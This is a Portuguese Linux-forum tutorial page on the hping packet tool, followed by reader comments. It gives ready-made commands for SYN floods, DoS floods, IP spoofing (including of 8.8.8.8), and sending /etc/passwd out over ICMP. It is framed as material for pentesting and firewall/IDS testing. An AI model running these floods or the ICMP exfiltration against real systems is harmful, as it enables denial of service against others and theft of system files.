Utilizando hping
Neste artigo farei uma apresentação e alguns exemplos de utilização do hping, uma ferramenta muito útil para trabalhos de pentest, testar IDS, firewall.
[ Hits: 90.426 ]
Por: Marcos Carraro em 09/08/2011
Exemplos
Exemplos básicos
Floodar com 10mil syn um ip na porta 80:# hping3 --flood --syn -c 10000 -a 1.2.3.4 -p 80 200.157.25.8
DoS - O ataque DoS, tem a ideia de fazer com que a placa de rede, ip, banda, não consiga respirar, fazendo disso uma parada dos serviços, ela simplesmente não consegue mais responder.
# hping3 --flood 200.157.25.8
DoS com outra TTL - Podemos mudar os nossos "HOPS" para chegar em nosso destino como neste caso, e fazemos uma inundação de 100 pacotes com ttl 250 para o IP, podemos usar outras tantas combinações de uma linha.
# hping --flood --ttl 250 --count 100 192.168.0.1
Spoof com um falso IP - Esta parte é legal até, podemos mandar milhares de pacotes com outro IP, não cheguei a testar em um FW público.
# hping --spoof 1.2.3.4 192.168.0.1
(hping --spoof FALSOIP IPQUENTE)
DoS com spoofing - Que tal fazer um DoS e IP spoofing ao mesmo tempo? Colocamos um IP falso para que o "destino" não desconfie EHEHEHEH. Isso é ate legal de se fazer, com testes interno funciona perfeitamente.
# hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2
Spoof Loucão - HAHHA que tal mandar várias inundações loucamente para um IP?
# hping3 --spoof 192.168.0.2 --icmp-ts 192.168.0.1
(hping3 --spoof MEUIP --icmp-ts IPDESTINO)
Exemplos mais complexos
Flood com assinatura - No caso ele vai enviar alguns pacotes com esta rotulação podendo ser um arquivo ou simplesmente na escrita, como vemos nos exemplos.# hping3 --flood --syn -a 1.2.3.4 -e "TESTANDO" -S -s 80 192.168.0.1
Monitorando com tcpdump:
0x0000: 45c0 006a 9f79 0000 4001 7e97 ac10 01d1 E..j.y..@.~..... 0x0010: ac10 01d1 0303 590b 0000 0000 4500 004e ......Y.....E..N 0x0020: e171 0000 4011 3d6b ac10 01d1 ac10 01d1 .q..@.=k........ 0x0030: 0a28 0007 003a 0902 5445 5354 4554 4553 .(...:..TESTETES 0x0040: 5445 0a00 0000 0000 0000 0000 0000 0000 TE.............. 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................Criando arquivo de assinatura:
# echo "TESTETESTE" > /vat/tmp/assinatura.sig
Enviando o ataque:
# hping -2 -p 7 192.168.0.3 -d 50 -E /var/tmp/assinatura.sig
Para monitorar:
# tcpdump -i ethX -nX proto 17
0x0000: 45c0 006a 9f79 0000 4001 7e97 ac10 01d1 E..j.y..@.~..... 0x0010: ac10 01d1 0303 590b 0000 0000 4500 004e ......Y.....E..N 0x0020: e171 0000 4011 3d6b ac10 01d1 ac10 01d1 .q..@.=k........ 0x0030: 0a28 0007 003a 0902 5445 5354 4554 4553 .(...:..TESTETES 0x0040: 5445 0a00 0000 0000 0000 0000 0000 0000 TE.............. 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................Transferir informações pelo ICMP - Que parte louca, sim quando esta lendo alguns manuais na internet achei engraçado esta parte:
# hping 192.168.0.3 --icmp -d 100 --sign signature --file /etc/passwd
Monitorando:
# tcpdump -i ethX -nX
A saída é bem parecida.
2. Instalação
3. Exemplos
4. Finalizando
Switch HP + Gerenciador Console + VLAN + DMZ + CentOS com VLAN
Análise de Atividades Suspeitas com Audit
Hidden Service - Disponibilizando seu site na Deep Web através do Tor
SELinux - Segurança em Servidores GNU/Linux
Uma breve abordagem sobre Criptografia
Desvendando código malicioso no fórum Viva o Linux
hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2
Veja a Ultima linha do traceroute 8.8.8.8
google-public-dns-a.google.com (8.8.8.8)
O exemplo de flood loucão no DNS do google foi sem querer?
Com a falta de IPs v4 válidos até aquele que achávamos inexistentes estão sendo usados. Logo logo o clássico exemplo 1.2.3.4 não será mais fictício, logo teremos que apelar para 300.300.300.300 hehehehe
Bom artigo.
Muito bom artigo parceiro!
Será de grande ajuda aos iniciantes e um manualzinho de referencia a alguns preguiçosos(assim como eu)!
auhsuahsuahushuahuhas
Parabéns!
@dvdia Cara, mostrei o dns do google, com um exemplo, podendo usar um IP real de outra pessoa para brincar.... ;D
300 Oo
@denisleandro é magnata, imagina o trablho que deu para escrever HEHEHHE, sorte dos livros pois o manual dos caras não é o bicho.
abraços e aproveitam para acessar o blog também marcoscarraro.blogspot.com
Marcos Carraro
marcos gostei da tool , ja conhecia mais não sabia o seu uso , so não deixa o pessoal do lulzsec saber hein rs rs
abraços
outra coisas , acho que esse artigo devia ter ido para o segurança linux , seria o local mais apropriado .
Instalação no Slackware também pode ser via SlackBuilds.
Se tiver o sbopkg é mais fácil ainda
# sbopkg -i hping3
Valeu galera....
Espero que gostem, se alguém tiver mais conteudo a adicionar sera bem vindo...
Não esqueçam de visitar meu blog....
marcoscarraro.blogspot.com
abraços Marcos Carraro
Patrocínio
Destaques
Artigos
Papagaiando o XFCE com temas e recursos
WhatsApp com Chamadas no Linux via Waydroid
XFCE - quase um Gnome ou Plasma mas muito mais leve
LXQT - funcional para máquinas pererecas e usuários menos exigentes
Dicas
SNMP Scan no OCS Inventory só funciona com HTTPS corretamente configurado
Removendo jogos e bloatware do KDE no Gentoo
Gentoo: Sincronização com Git e Automação via Systemd
Instalação do tema Fluent GTK no Zorin OS
PKI na Prática: Criando CA e Certificado Wildcard (Automatizado)
Tópicos
GOG confirma suporte oficial ao sistema Linux: "o trabalho começo... (1)
Midia de instalação LM-21.3 não inicializa (14)
eu queria saber no lenovo slim, se tem como ver os mhz de memoria e tu... (3)
Top 10 do mês
-
Xerxes
1° lugar - 119.786 pts -
Fábio Berbert de Paula
2° lugar - 56.689 pts -
Buckminster
3° lugar - 25.987 pts -
Alberto Federman Neto.
4° lugar - 18.871 pts -
Mauricio Ferrari (LinuxProativo)
5° lugar - 18.592 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
6° lugar - 18.239 pts -
Sidnei Serra
7° lugar - 17.607 pts -
Daniel Lara Souza
8° lugar - 17.371 pts -
edps
9° lugar - 17.432 pts -
Andre (pinduvoz)
10° lugar - 16.224 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
